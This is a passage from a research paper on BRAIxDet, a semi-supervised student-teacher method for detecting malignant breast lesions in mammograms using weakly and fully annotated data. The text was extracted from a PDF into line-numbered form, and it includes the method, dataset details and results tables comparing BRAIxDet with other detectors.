486
+ tection performance.
487
+ System
488
+ overview.
489
+ To
490
+ effectively
491
+ utilise
492
+ the
493
+ train-
494
+ ing
495
+ samples
496
+ in
497
+ Ds
498
+ and
499
+ Dw,
500
+ we
501
+ propose
502
+ a
503
+ 2-stage
504
+ learning
505
+ process,
506
+ with
507
+ a
508
+ weakly-supervised
509
+ pre-
510
+ training
511
+ using
512
+ all
513
+ samples
514
+ from
515
+ Dw
516
+ and
517
+ �Ds
518
+ =
519
+
520
+ (xm
521
+ i , xa
522
+ i , cm
523
+ i )|(xm
524
+ i , xa
525
+ i , Ym
526
+ i ) ∈ Ds, and cm
527
+ i = maxj∈{1,...,|Ym
528
+ i |}(cm
529
+ i,j)
530
+
531
+ ,
532
+ followed by semi-supervised student-teacher learning using
533
+ Ds and pseudo-labelled �Dw, as shown in Figure 2.
534
+ In the
535
+ pre-training stage described in Section 3.1, we train the
536
+ multi-view mammogram classifier BRAIxMVCCL (Chen
537
+ et al., 2022) to learn an effective feature extractor and a
538
+ reasonably accurate GradCAM detector (Selvaraju et al.,
539
+ 2017) to support the next stage of semi-supervised learning.
540
+ After pre-training, we replace the classification layer of
541
+ BRAIxMVCCL with a detection head, forming the BRAIxDet
542
+ model based on the Faster R-CNN backbone (Ren et al.,
543
+ 2015), and we also duplicate BRAIxDet into the student and
544
+ teacher models.
545
+ In our student-teacher semi-supervised
546
+ learning (SSL) stage explained in Section 3.2, we train the
547
+ student and teacher models, where the teacher uses its detector
548
+ and the GradCAM detections in �Dw to generate localisation
549
+ pseudo-labels, denoted by �Ym
550
+ i , for the lesions in the samples
551
+ (xm
552
+ i , xa
553
+ i , cm
554
+ i ) ∈ Dw, forming the new pseudo-labelled dataset
555
+ �Dw to train the student, and the student updates the teacher’s
556
+ model parameters based on the exponential moving average
557
+ (EMA) (Laine and Aila, 2016; Tarvainen and Valpola, 2017) of
558
+ its model parameters. Additionally, the student is also trained
559
+ to detect lesions using the fully-annotated samples from Ds.
560
+ During inference, the final lesion detection results are rep-
561
+ resented by the bounding box predictions from the teacher
562
+ BRAIxDet model.
563
+ 3.1. Pre-training on multi-view mammogram classification
564
+ We pre-train our previously proposed BRAIxMVCCL
565
+ model (Chen et al., 2022) on the classification task before trans-
566
+ forming it into a Faster R-CNN detector (Ren et al., 2015) to be
567
+ trained to localise cancerous lesions. The multi-view backbone
568
+ classifier BRAIxMVCCL (Chen et al., 2022), parameterised
569
+ by θ ∈ Θ and partially illustrated in Figure 3, is defined by
570
+ ˆc = fθ(xm, xa), which returns a classification ˆc ∈ [0, 1] (1 =
571
+ cancer and 0 = non-cancer) given the main and auxiliary views
572
+ xm, xa. This model is trained with �Ds and Dw defined above to
573
+ Algorithm 1 Produce GradCAM pseudo-labelled dataset �Dw
574
+ 1: require: Weakly-supervised dataset Dw, BRAIxMVCCL
575
+ model fθ(.), and threshold τ
576
+ 2: �Dw = ∅
577
+ ▷ Initialise pseudo-labelled �Dw
578
+ 3: for (xm
579
+ i , xa
580
+ i , ci) ∈ Dw, where ci = 1 do
581
+ 4:
582
+ ˆci = fθ(xm
583
+ i , xa
584
+ i )
585
+ 5:
586
+ hi = GradCAM( fθ(xm
587
+ i , xa
588
+ i ), ci)
589
+ ▷ Heatmap prediction
590
+ 6:
591
+ ˜hi = I(hi > τ) ⊙ hi
592
+ ▷ Binarise heatmap
593
+ 7:
594
+ Li = CCA(˜hi)
595
+ ▷ Connected component analysis
596
+ 8:
597
+ for l j ∈ Li do
598
+ ▷ Remove small and large components
599
+ 9:
600
+ if area(l j) < 32 × 32 then Li ← Li \ lj
601
+ 10:
602
+ if area(l j) > 1024 × 1024 then Li ← Li \ lj
603
+ 11:
604
+ �Ym
605
+ i = ∅
606
+ ▷ GradCAM detections
607
+ 12:
608
+ for l j ∈ Li do
609
+ 13:
610
+ bj = BBox(l j)
611
+ ▷ Get bounding box from lj
612
+ 14:
613
+ �Ym
614
+ i ← �Ym
615
+ i
616
+ �(ˆci, bj)
617
+ ▷ Add bounding box to �Ym
618
+ i
619
+ 15:
620
+ �Dw ← �Dw
621
+ �(xm
622
+ i , xa
623
+ i , �Ym
624
+ i )
625
+ 16: return �Dw
626
+ minimise classification mistakes and maximise the consistency
627
+ between the global image features produced from each view, as
628
+ follows:
629
+ θ∗ = arg min
630
+ θ∈Θ �
631
+ (xm
632
+ i ,xa
633
+ i ,cm
634
+ i )∈Dw
635
+ � �Ds
636
+ ℓbce( fθ(xm
637
+ i , xa
638
+ i ), cm
639
+ i ) + ℓsim( f g
640
+ θ (xm
641
+ i ), f g
642
+ θ (xa
643
+ i )),
644
+ (1)
645
+ where ℓbce(.) denotes the binary cross-entropy (BCE) loss, and
646
+ ℓsim(.) denotes the consistency loss between the global features
647
+ produced by f g
648
+ θ (.), which is part of the model fθ(.).
649
+ A particularly important structure from the BRAIxMVCCL
650
+ classifier, which will be useful for the detector BRAIxDet, is
651
+ the local co-occurrence module (LCM) that explores the cross-
652
+ view feature relationships at local regions for the main view
653
+ image xm. The LCM is denoted by ˜um = um ⊕ f l
654
+ θ(um, ua), where
655
+ ˜um ∈ R ˆH× ˆW×D′ (with ˆH < H and ˆW < W), ⊕ denotes the con-
656
+ catenation operator, and f l
657
+ θ(.) is part of fθ(.). The features used
658
+ by LCM are extracted from um = f b
659
+ θ (xm) and ua = f b
660
+ θ (xa),
661
+ where f b
662
+ θ (.) is also part of fθ(.) and um, ua ∈ U ⊂ R ˆH× ˆW×D
663
+ (with D > D′).
664
+ The student-teacher SSL stage will require the detection of
665
+ pseudo labels for the weakly supervised dataset Dw. To avoid
666
+ the confirmation bias described in Section 2.3, we combine the
667
+ teacher’s detection results, explained below in Section 3.2, with
668
+ the GradCAM (Selvaraju et al., 2017) detections for the cancer
669
+ cases produced by the BRAIxMVCCL classifier. Algorithm 1
670
+ displays the pseudo-code to generate GradCAM pseudo labels,
671
+ where GradCAM( fθ(xm
672
+ i , xa
673
+ i ), ci) returns the GradCAM heatmap
674
+ hi ∈ [0, 1]H×W for class ci on image xm
675
+ i , I(hi > τ) produces
676
+ a binary map with the heatmap pixels larger than τ being set
677
+ to 1 or 0 otherwise, ⊙ denotes the element-wise multiplication
678
+ operator, CCA(hi) produces the set of connected components
679
+ Li = {l j}|Li|
680
+ j=1 from the binarised heatmap ˜hi (with lj ∈ {0, 1}H×W),
681
+ area(l j) returns the area (i.e., number of pixels ω ∈ Ω where
682
+
683
+ 6
684
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
685
+ Auxiliary View
686
+ FN
687
+ FN
688
+ :
689
+ :
690
+ Local Co-Occurrence
691
+ Proposals
692
+ LCM
693
+ Backbone
694
+ RPN
695
+ Main View
696
+ Detection Head
697
+ Roi Pooling
698
+ RoI Head
699
+ Box
700
+ cls
701
+ Box
702
+ reg
703
+ Detection
704
+ Outcome
705
+ Fig. 3. BRAIxDet takes two mammographic views (main and auxiliary) and uses a backbone model to extract the main and auxiliary features um and ua,
706
+ where the main components are: 1) the local co-occurrence module (LCM) that models the local semantic relationships between the two views to output
707
+ the cross-view feature ˜um; and 2) the detection module that outputs the classifications {cm
708
+ j }|Ym|
709
+ j=1 and lesion bounding box predictions {bm
710
+ j }|Ym|
711
+ j=1 . FN stands for
712
+ fully-connected layers, ⊕ indicates the concatenation operator, and RPN is the region proposal network.
713
+ l j(ω) = 1, where Ω is the image lattice) of the connected com-
714
+ ponent l j, and BBox(lj) returns the 4 coordinates of the bound-
715
+ ing box bj from the (left,right,top,bottom) bounds of connected
716
+ component l j. This prediction process produces a set of bound-
717
+ ing boxes paired with the confidence score ˆci from classifier
718
+ BRAIxMVCCL (Chen et al., 2022), forming �Ym
719
+ i = {(ˆci, bj)}
720
+ |�Ym
721
+ i |
722
+ j=1
723
+ for each training sample.
724
+ 3.2. Student-teacher SSL for lesion detection
725
+ After pre-training, we modify the structure of the trained
726
+ BRAIxMVCCL model (Chen et al., 2022) fθ(xm
727
+ i , xa
728
+ i ) by prun-
729
+ ing the global consistency module (GCM) denoted by f g
730
+ θ (.),
731
+ the classification layers, and the part of the local co-occurrence
732
+ module (LCM) that produces spatial attention for the auxiliary
733
+ image since these layers do not provide useful information for
734
+ lesion localisation in the main image. This pruning process
735
+ is followed by the addition of the detection head (Ren et al.,
736
+ 2015), consisting of the region proposal network (RPN) and
737
+ region of interest (RoI head) head, which forms the detector
738
+ �Ym
739
+ i = f d
740
+ θ (xm
741
+ i , xa
742
+ i ), where �Ym
743
+ i = {(ˆcm
744
+ i, j, ˆbm
745
+ i, j)}
746
+ |�Ym
747
+ i |
748
+ j=1 , with ˆcm
749
+ i, j ��� [0, 1]
750
+ and ˆbm
751
+ i, j ∈ B ⊂ R4.
752
+ Then, we duplicate this model into a
753
+ teacher f d
754
+ θt(xm
755
+ i , xa
756
+ i ) and a student f d
757
+ θs(xm
758
+ i , xa
759
+ i ) that are used in the
760
+ SSL training (Tarvainen and Valpola, 2017), where we train the
761
+ student with the fully-labelled Ds and the pseudo-labelled �Dw,
762
+ while the teacher network is trained with the exponential mov-
763
+ ing average (EMA) of the student’s parameters (Tarvainen and
764
+ Valpola, 2017). Figure 3 shows the BRAIxDet structure, and
765
+ Figure 4 summarises the student-teacher SSL training stage.
766
+ For the supervised training of the student, we followed the
767
+ Faster-RCNN training procedure that consists of four loss func-
768
+ tions to train the RPN and Roi head modules to classify bound-
769
+ ing boxes and regress their coordinates (Ren et al., 2015). The
770
+ objective function is defined as
771
+ ℓsup(Ds, θs) =
772
+
773
+ (xm
774
+ i ,xa
775
+ i ,Ym
776
+ i )∈Ds
777
+
778
+ ℓrpn
779
+ cls (f d
780
+ θs(xm
781
+ i , xa
782
+ i ), Ym
783
+ i ) + ℓrpn
784
+ reg ( f d
785
+ θs(xm
786
+ i , xa
787
+ i ), Ym
788
+ i )
789
+
790
+ +
791
+
792
+ (xm
793
+ i ,xa
794
+ i ,Ym
795
+ i )∈Ds
796
+
797
+ ℓroi
798
+ cls( f d
799
+ θs(xm
800
+ i , xa
801
+ i ), Ym
802
+ i ) + ℓroi
803
+ reg( f d
804
+ θs(xm
805
+ i , xa
806
+ i ), Ym
807
+ i )
808
+
809
+ ,
810
+ (2)
811
+ where ℓrpn
812
+ cls (.), ℓrpn
813
+ reg (.) denote the RPN classification and regres-
814
+ sion losses with respect to the anchors, and ℓroi
815
+ cls(.), ℓroi
816
+ reg(.) repre-
817
+ sent the RoI head classification and regression losses with re-
818
+ spect to the region proposal features (Ren et al., 2015).
819
+ These pseudo-labels to train the student are provided by
820
+ the teacher, which form the pseudo-labelled dataset �Dw =
821
+
822
+ (xm
823
+ i , xa
824
+ i , �Ym
825
+ i )|(xm
826
+ i , xa
827
+ i , cm
828
+ i ) ∈ Dw, and �Ym
829
+ i = f d
830
+ θt(xm
831
+ i , xa
832
+ i )
833
+
834
+ .
835
+ How-
836
+ ever, at the beginning of the training (first two training epochs),
837
+ the pseudo-labels in �Dw are unreliable, which can cause the
838
+ confirmation bias issue mentioned in Section 2.3, so we also
839
+ use the GradCAM predictions in �Dw from Algorithm 1. More
840
+ specifically, starting from (xm
841
+ i , xa
842
+ i , �Ym
843
+ i ) ∈ �Dw, we first select
844
+ the most confident prediction from (ˆcm
845
+ i, j∗, ˆbm
846
+ i, j∗) ∈ �Ym
847
+ i , with j∗ =
848
+ arg maxj∈{1,...,|�Ym
849
+ i |} ˆci, j, and add it to the set of GradCAM detec-
850
+ tions in �Ym
851
+ i . Then, for each training sample (xm
852
+ i , xa
853
+ i , �Ym
854
+ i ) ∈ �Dw
855
+ we run non-max suppression (NMS) on the teacher and Grad-
856
+ CAM detections to form �Ym
857
+ i ← NMS (�Ym
858
+ i
859
+ �(ˆcm
860
+ i, j∗, ˆbm
861
+ i, j∗)). After
862
+ these initial training stages, the pseudo-label is solely based on
863
+ the teacher’s prediction from �Dw. The objective function to
864
+ train the student using �Dw is defined as
865
+ ℓwek(�Dw, θs) =
866
+
867
+ (xm
868
+ i ,xa
869
+ i ,�Ym
870
+ i )∈�Dw
871
+
872
+ ℓrpn
873
+ cls ( f d
874
+ θs(xm
875
+ i , xa
876
+ i ), �Ym
877
+ i ) + ℓrpn
878
+ reg ( f d
879
+ θs(xm
880
+ i , xa
881
+ i ), �Ym
882
+ i )
883
+
884
+ +
885
+
886
+ (xm
887
+ i ,xa
888
+ i ,�Ym
889
+ i )∈�Dw
890
+
891
+ ℓroi
892
+ cls( f d
893
+ θs(xm
894
+ i , xa
895
+ i ), �Ym
896
+ i ) + ℓroi
897
+ reg( f d
898
+ θs(xm
899
+ i , xa
900
+ i ), �Ym
901
+ i )
902
+
903
+ ,
904
+ (3)
905
+
906
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
907
+ 7
908
+ BRAIxDet
909
+ (Teacher)
910
+ RPN
911
+ RPN
912
+ Roi Head
913
+ BRAIxDet
914
+ (Student)
915
+ NMS
916
+ EMA
917
+ GradCAM Prediction
918
+ Box Filter
919
+ Predict
920
+ Weakly-supervised Flow
921
+ Fully-supervised Flow
922
+ Fig. 4. The student-teacher SSL of our BRAIxDet is optimised in two steps: 1) the student is trained with the fully-annotated Ds, using loss ℓsup(.) in (2),
923
+ and with the pseudo-labelled �Dw produced by the teacher and GradCAM predictions in �Dw for the weakly supervised dataset Dw; and 2) the teacher
924
+ network is updated based on the EMA of the student’s network parameters. We introduce the following two steps to improve the quality of the pseudo
925
+ labels produced by the teacher: a) a box filtering process that selects the teacher’s most confident prediction; b) a non-maximum suppression (NMS)
926
+ operation that rejects duplicated boxes by comparing the overlap and objectiveness score between the most confident of the teacher’s predictions and the
927
+ GradCAM predictions. The running mean γ and standard deviation β for both the batch normalisation of the teacher and student models are fixed during
928
+ the entire process.
929
+ where the losses used here are the same as the ones in (2).
930
+ The overall loss function to train the student is
931
+ ℓstu(Ds, �Dw, θs) = ℓsup(Ds, θs) + λℓwek(�Dw, θs),
932
+ (4)
933
+ where λ is the hyper-parameter that controls the contribution
934
+ of the weakly-supervised loss. The teacher’s model parameters
935
+ are updated with EMA (Tarvainen and Valpola, 2017):
936
+ θ′
937
+ t = αθt + (1 − α)θs,
938
+ (5)
939
+ where α ∈ (0, 1) is a hyper-parameter that represents the
940
+ smoothing factor, where a high value of α provides a slow up-
941
+ dating process.
942
+ 3.3. Batch Normalisation for EMA
943
+ In the original mean-teacher training (Tarvainen and Valpola,
944
+ 2017), both student and teacher use the standard batch nor-
945
+ malization (BN). For the student network, the model parame-
946
+ ter θs is aligned with the BN parameters γ and standard devia-
947
+ tion β since these parameters are optimized based on the batch-
948
+ wise statistics. However, this relationship does not hold for the
949
+ teacher’s network since the teacher’s model parameter θt is up-
950
+ dated by EMA, but the BN statistics are not updated. Cai et al.
951
+ (2021) claimed that this issue can be solved by applying EMA
952
+ on BN statistics to avoid the misalignment in the teacher’s pa-
953
+ rameter space. We propose a simpler approach to address this
954
+ issue, which is to simply freeze the BN layers for both student
955
+ and teacher models since the BN statistics is already well es-
956
+ timated from the entire dataset �Ds
957
+ � Dw during pre-training.
958
+ We show in the experiments that our proposal above addresses
959
+ well the mismatch between the student’s and the teacher’s pa-
960
+ rameters and the dependency on the student’s training samples,
961
+ providing better detection generalisation than presented by Cai
962
+ et al. (2021).
963
+ 4. Experiments
964
+ In this section, we first introduce the two datasets used in
965
+ the experiments, and then we explain the experimental setting
966
+ containing variable proportions of fully and weakly annotated
967
+ samples in the training set. Next, we discuss the implementa-
968
+ tion details of our method and competing approaches. We con-
969
+ clude the section with a visualization of the detection results
970
+ and ablation studies.
971
+ 4.1. Datasets
972
+ We validate our proposed BRAIxDet method on two datasets
973
+ that contain incomplete malignant breast lesion annotations,
974
+ namely: our own Annotated Digital Mammograms and As-
975
+ sociated Non-Image data (ADMANI), and the public Curated
976
+ Breast Imaging Subset of the Digital Database for Screening
977
+ Mammography (CBIS-DDSM) (Lee et al., 2017).
978
+ The ADMANI Dataset was collected from several breast
979
+ screening clinics from the State of Victoria in Australia, be-
980
+ tween 2013 and 2019, and contains pre-defined training and
981
+ testing sets.
982
+ Each exam on ADMANI has two mammo-
983
+ graphic views (CC and MLO) per breast produced by one of
984
+ the following manufactures: SiemensTM, HologicTM, Fujifilm
985
+ CorporationTM, PhilipsTM Digital Mammography Sweden AB,
986
+ Konica MinoltaTM, GETM Medical Systems, Philips Medical
987
+ SystemsTM, and AgfaTM. The training set contains 771,542 ex-
988
+ ams with 15,994 cancer cases (containing malignant findings)
989
+ and 3,070,174 non-cancer cases (with 44,040 benign cases and
990
+ 3,026,134 cases with no findings).
991
+ This training set is split
992
+ 90/10 for training/validation in a patient-wise manner.
993
+ The
994
+ training set has 7,532 weakly annotated cancer cases and 6,892
995
+ fully annotated cancer cases, while the validation set has 759
996
+ fully annotated cancer cases and no weakly annotated cases
997
+
998
+ 8
999
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
1000
+ since they are not useful for model selection. The testing set
1001
+ contains 83,990 exams with 1,262 cancer cases (containing ma-
1002
+ lignant findings) and 334,698 non-cancer cases (with 3,880 be-
1003
+ nign cases and 330,818 no findings). Given that we are test-
1004
+ ing lesion detection, we remove all non-cancer cases, and all
1005
+ weakly annotated cancer cases, leaving us with 900 fully anno-
1006
+ tated cancer cases.
1007
+ Initial Prediction
1008
+ After box filtering
1009
+ GradCAM Prediction
1010
+ Final Pseudo box
1011
+ Fig. 5. Visualisation of the pseudo-labelling by the teacher using a CC
1012
+ (top) and an MLO (bottom) view of a weakly-annotated sample.
1013
+ The
1014
+ process starts with the initial predictions by the BRAIxDet teacher (first
1015
+ column), which is filtered to keep the detection with the highest score
1016
+ (second column). Next, we show the GradCAM detections produced by
1017
+ BRAIxMVCCL (Chen et al., 2022) (third column), and the final pseudo
1018
+ labels produced by the teacher to train the student with all GradCAM de-
1019
+ tections and the top BRAIxDet teacher detection (last column).
1020
+ The publicly available CBIS-DDSM dataset (Lee et al.,
1021
+ 2017) contains images from 1,566 participants, where 1,457
1022
+ cases have malignant findings (with 1,696 mass cases and 1,872
1023
+ calcification cases). The dataset has a pre-defined training and
1024
+ testing split, with 2,864 images (with 1,181 malignant cases and
1025
+ 1,683 benign cases) and 704 (with 276 malignant cases and 428
1026
+ benign cases) images respectively. Each exam on CBIS-DDSM
1027
+ also has two mammographic views (CC and MLO) per breast.
1028
+ 4.2. Experimental settings
1029
+ To systematically test the robustness of our method to dif-
1030
+ ferent rates of incomplete malignant breast lesion annotations,
1031
+ we propose an experimental setting that contains different pro-
1032
+ portions of fully- and weakly-annotated samples. In the par-
1033
+ tially labelled protocol, we follow typical semi-supervised set-
1034
+ tings (Sohn et al., 2020; Liu et al., 2021; Xu et al., 2021; Liu
1035
+ et al., 2022), where we sub-sample the fully-annotated subset
1036
+ using the ratio 1/n, where the remaining 1 − 1/n of the subset
1037
+ becomes weakly-annotated. More specifically, on ADMANI,
1038
+ we split the fully-annotated subset with the ratios 1/2, 1/4,
1039
+ 1/8, 1/16. We adopt the same experimental setting for CBIS-
1040
+ DDSM (Lee et al., 2017). In the fully labelled protocol, we
1041
+ use all ADMANI training samples that have the lesion localisa-
1042
+ tion annotation as the fully-annotated subset and all remaining
1043
+ weakly-labelled samples as the weakly-annotated subset. Un-
1044
+ like the synthetic partially labelled protocol setting, the fully
1045
+ labelled protocol setup is a real-world challenge since it uses
1046
+ all data available from ADMANI, allowing methods to lever-
1047
+ age all the available samples to improve detector performance
1048
+ on a large-scale mammogram dataset.
1049
+ All methods are assessed using the standard mean average
1050
+ precision (mAP) and free-response receiver operating char-
1051
+ acteristic (FROC). The mAP measures the average precision
1052
+ of true positive (TP) detections of malignant lesions, where a
1053
+ TP detection is defined as producing at least a 0.2 intersec-
1054
+ tion over union (IoU) with respect to the bounding box anno-
1055
+ tation (Liu et al., 2020b; Yang et al., 2020, 2021). On the other
1056
+ hand, FROC measures the recall at different false positive de-
1057
+ tections per image (FPPI). In this paper, we measure the recall
1058
+ at 0.5 FPPI (Recall @ 0.5), which means the recall at which the
1059
+ detector produces one false positive every two images. Such
1060
+ Recall@0.5 is a common measure to assess lesion detection
1061
+ from mammograms (Ma et al., 2021; Yang et al., 2020, 2021).
1062
+ 4.3. Implementation details
1063
+ We pre-process each image to remove text annotations and
1064
+ background noise outside the breast region, then we crop the
1065
+ area outside the breast region and pad the pre-processed im-
1066
+ ages, such that their H/W has the ratio 1536/768 pixels. Dur-
1067
+ ing data loading, we resize the input images to 1536 x 768
1068
+ pixels and flip the images, so that the nipple is located on
1069
+ the right hand size of the image.
1070
+ For the pre-training, we
1071
+ implement the classifier BRAIxMVCCL (Chen et al., 2022)
1072
+ with the EfficientNet-b0 (Tan and Le, 2019) backbone, initial-
1073
+ ized with ImageNet-trained (Russakovsky et al., 2015) weights.
1074
+ Our pre-training relies on the Adam optimiser (Kingma and
1075
+ Ba, 2014) using a learning rate of 0.0001, weight decay of
1076
+ 10−6, batch size of 8 images and 20 epochs.
1077
+ The semi-
1078
+ supervised student-teacher learning first updates the classi-
1079
+ fier BRAIxMVCCL (Chen et al., 2022) into the proposed de-
1080
+ tector BRAIxDet using the Faster R-CNN (Ren et al., 2015)
1081
+ backbone. We set the binarising threshold τ in Algorithm 1 to
1082
+ 0.5. We follow the default Faster R-CNN hyper-parameter set-
1083
+ ting from the Torchvision Library (Paszke et al., 2019), except
1084
+ for the NMS threshold that was reduced to 0.2 and for the TP
1085
+ IoU detection for Roi head which was set to 0.2. The optimiza-
1086
+ tion of BRAIxDet also relies on Adam optimiser (Kingma and
1087
+ Ba, 2014) using a learning rate of 0.00005, weight decay of
1088
+ 10−5, batch size of 4 images and 20 epochs. Similarly to pre-
1089
+ vious papers (Tarvainen and Valpola, 2017; Liu et al., 2021),
1090
+ we set λ, in the overall student loss of (4), to 0.25, and α in
1091
+ the EMA to update the teacher’s parameter in (5) to 0.999. For
1092
+ the pre-training and student-teacher learning stages, we use Re-
1093
+ duceLROnPlateau to dynamically control the learning rate re-
1094
+ duction based on the BCE loss during model validation, where
1095
+ the reduction factor is set to 0.1.
1096
+
1097
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
1098
+ 9
1099
+ Table 1. mAP and Recall @ 0.5 results on the testing images of ADMANI using the partially labelled protocol based on splitting the fully annotated subset
1100
+ with the ratios 1/16, 1/8, 1/4, and 1/2 (we show the number of fully annotated images inside the brackets). We highlight the best result in each column.
1101
+ Method
1102
+ mAP
1103
+ Recall @ 0.5
1104
+ 1/16 (430)
1105
+ 1/8 (861)
1106
+ 1/4 (1723)
1107
+ 1/2 (3446)
1108
+ 1/16 (430)
1109
+ 1/8 (861)
1110
+ 1/4 (1723)
1111
+ 1/2 (3446)
1112
+ Faster RCNN (Ren et al., 2015)
1113
+ 0.6198
1114
+ 0.7072
1115
+ 0.7560
1116
+ 0.8098
1117
+ 0.6222
1118
+ 0.7235
1119
+ 0.7673
1120
+ 0.8150
1121
+ STAC (Sohn et al., 2020)
1122
+ 0.7385
1123
+ 0.7918
1124
+ 0.8211
1125
+ 0.8480
1126
+ 0.7478
1127
+ 0.8276
1128
+ 0.8733
1129
+ 0.8821
1130
+ MT (Tarvainen and Valpola, 2017)
1131
+ 0.7870
1132
+ 0.8627
1133
+ 0.8589
1134
+ 0.8706
1135
+ 0.8150
1136
+ 0.9075
1137
+ 0.8999
1138
+ 0.9062
1139
+ Unbiased Teacher (Liu et al., 2021)
1140
+ 0.6330
1141
+ 0.7558
1142
+ 0.8081
1143
+ 0.8191
1144
+ 0.6464
1145
+ 0.7947
1146
+ 0.8454
1147
+ 0.8530
1148
+ Soft Teacher (Xu et al., 2021)
1149
+ 0.8224
1150
+ 0.8399
1151
+ 0.8604
1152
+ 0.8707
1153
+ 0.8589
1154
+ 0.8948
1155
+ 0.9037
1156
+ 0.9062
1157
+ BRAIxDet
1158
+ 0.8953
1159
+ 0.8944
1160
+ 0.9116
1161
+ 0.9184
1162
+ 0.9265
1163
+ 0.9303
1164
+ 0.9392
1165
+ 0.9468
1166
+ Table 2. mAP and Recall @ 0.5 results on the testing images of ADMANI
1167
+ using the fully labelled protocol based on all fully annotated data and extra
1168
+ weakly-labelled data (we show the number of extra weakly labelled images
1169
+ inside the brackets). We highlight the best result in each column.
1170
+ Method
1171
+ 100%+Extra (6298)
1172
+ mAP
1173
+ Recall @ 0.5
1174
+ Faster RCNN (Ren et al., 2015)
1175
+ 0.8460
1176
+ 0.8510
1177
+ STAC (Sohn et al., 2020)
1178
+ 0.8912
1179
+ 0.9278
1180
+ MT (Tarvainen and Valpola, 2017)
1181
+ 0.8956
1182
+ 0.9290
1183
+ Unbiased Teacher (Liu et al., 2021)
1184
+ 0.8755
1185
+ 0.9252
1186
+ Soft Teacher (Xu et al., 2021)
1187
+ 0.9021
1188
+ 0.9285
1189
+ BRAIxDet
1190
+ 0.9294
1191
+ 0.9531
1192
+ We compare our method to the following state-of-the-
1193
+ art (SOTA) approaches: Faster RCNN (Ren et al., 2015)1,
1194
+ STAC (Sohn et al., 2020)2, MT (Tarvainen and Valpola, 2017)3,
1195
+ Unbiased Teacher (Liu et al., 2021)4, and Soft Teacher (Xu
1196
+ et al., 2021)5. These methods are implemented using Faster
1197
+ RCNN with EfficientNet-b0 (Tan and Le, 2019) backbone, pre-
1198
+ trained on the ADMANI dataset using the fully- and weakly-
1199
+ annotated training subsets, following the same setup as our
1200
+ BRAIxDet. After pre-training, while Faster RCNN is trained
1201
+ using only the fully-annotated subset, all other methods are
1202
+ trained with both the fully- and weakly-annotated training sub-
1203
+ sets. All these competing methods’ results are produced by
1204
+ running the code available from their official GitHub reposi-
1205
+ tory. All experiments are implemented with Pytorch (Paszke
1206
+ et al., 2019) and conducted on an NVIDIA A40 GPU (48GB),
1207
+ where training takes about 30 hours on ADMANI and 8 hours
1208
+ on DDSM (Smith, 2017), and testing takes about 0.1s per im-
1209
+ age. Given that the competing methods use Faster RCNN with
1210
+ the same backbone (EffientNet-b0) as ours and rely on pre-
1211
+ training, their training and testing running times are similar to
1212
+ ours.
1213
+ 1https://github.com/pytorch/vision
1214
+ 2https://github.com/google-research/ssl_detection
1215
+ 3https://github.com/CuriousAI/mean-teacher
1216
+ 4https://github.com/facebookresearch/unbiased-teacher.
1217
+ 5https://github.com/microsoft/SoftTeacher
1218
+ 4.4. Results
1219
+ We first present the results produced by our BRAIxDet and
1220
+ competing approaches using the partially labelled protocol on
1221
+ ADMANI. Table 1 shows the mAP and Recall @ 0.5 results,
1222
+ where BRAIxDet shows an mAP of 0.8953 for the ratio 1/16,
1223
+ which is more than 7% larger than the second best method, Soft
1224
+ Teacher. For the ratio 1/2, the mAP improvement is still large
1225
+ at around 4.5%. Similarly, for the Recall @ 0.5, BRAIxDet is
1226
+ around 7% better than Soft Teacher (the second best method)
1227
+ for the ratio 1/16, and when the ratio is 1/2, the improve-
1228
+ ment is around 4%.
1229
+ The results from the partially labelled
1230
+ protocol on CBIS-DDSM on Table 4 are similar to ADMANI.
1231
+ Indeed, our BRAIxDet shows consistently better results than
1232
+ other approaches for all training ratios. For instance, BRAIxDet
1233
+ presents an mAP of 0.5333 for ratio 1/16, which is much larger
1234
+ than the second best, Unbiased Teacher, with a mAP of 0.3618.
1235
+ For ratio 1/2, our mAP result is 5% better than Soft Teacher
1236
+ (second best). Similar conclusions can be drawn from the re-
1237
+ sults of the Recall @ 0.5. Another interesting difference be-
1238
+ tween the ADMANI and CBIS-DDSM results is the general
1239
+ lower performance on the CBIS-DDSM dataset. This can be ex-
1240
+ plained by the lower quality of the images in the CBIS-DDSM
1241
+ dataset, as observed when comparing with Figures 6 and 7. It is
1242
+ worth noticing that in general, on both datasets, both BRAIxDet
1243
+ and competing SSL methods show better mAP and Recall @
1244
+ 0.5 results than Faster RCNN, demonstrating the importance of
1245
+ using not only the fully-annotated cases, but also the weakly-
1246
+ annotated training subset.
1247
+ The results produced by BRAIxDet and competing ap-
1248
+ proaches using the fully labelled protocol on ADMANI are
1249
+ shown in Table 2. The mAP results confirm that BRAIxDet
1250
+ shows an improvement of 2.7% with respect to the second best
1251
+ approach Soft Teacher. Similarly, BRAIxDet’s Recall @ 0.5
1252
+ results show an improvement of around 2.5% over competing
1253
+ SSL methods. Similarly to the partially labelled protocol from
1254
+ Table 1, BRAIxDet and competing SSL methods show better
1255
+ mAP and Recall @ 0.5 results than Faster RCNN, confirming
1256
+ again the importance of using the fully- and weakly-annotated
1257
+ training subsets.
1258
+ We visualise the detection results by the most competitive
1259
+ methods and our proposed BRAIxDet model on ADMANI
1260
+ (Figure 6) and on CBIS-DDSM (Figure 7).
1261
+ In general, we
1262
+ can see that our method is more robust to false positive detec-
1263
+
1264
+ 10
1265
+ Yuanhong Chen et al. / Medical Image Analysis (2023)
1266
+ BRAIxDet
1267
+ STAC
1268
+ Unbiased Teacher
1269
+ Soft Teacher
1270
+ Mean Teacher
1271
+ Origin
1272
+ Fig. 6. Visualisation of the results achieved by the most competitive methods and our BRAIxDet (column titles show each method’s name) on two ADMANI
1273
+ testing images, where the blue rectangles show lesion annotations and the red rectangles display the detections.
1274
+ Table 3. Influence of each stage of our method using mAP and Recall @ 0.5 results on the fully-labelled protocol. 1st row: Faster RCNN (Ren et al.,
1275
+ 2015) with its EfficientNet-b0 backbone pre-trained with fully- and weakly-annotated subsets and trained using only the fully-annotated subset. 2nd row:
1276
+ pre-train the multi-view BRAIxMVCCL classifier (Chen et al., 2022), and keep the LCM module for the second training stage that uses the fully-annotated
1277
+ training subset. 3rd row: train Faster RCNN with the student-teacher SSL using a backbone without LCM. 4th row: integrate Faster RCNN, LCM and
1278
+ student-teacher SSL. 5th row: BRAIxDet results using the BRAIxMVCCL’s GradCAM predictions.
1279
+ Faster RCNN
1280
+ LCM
1281
+ Student-teacher
1282
+ GradCAM
1283
+ mAP
1284
+ Recall @ 0.5
1285
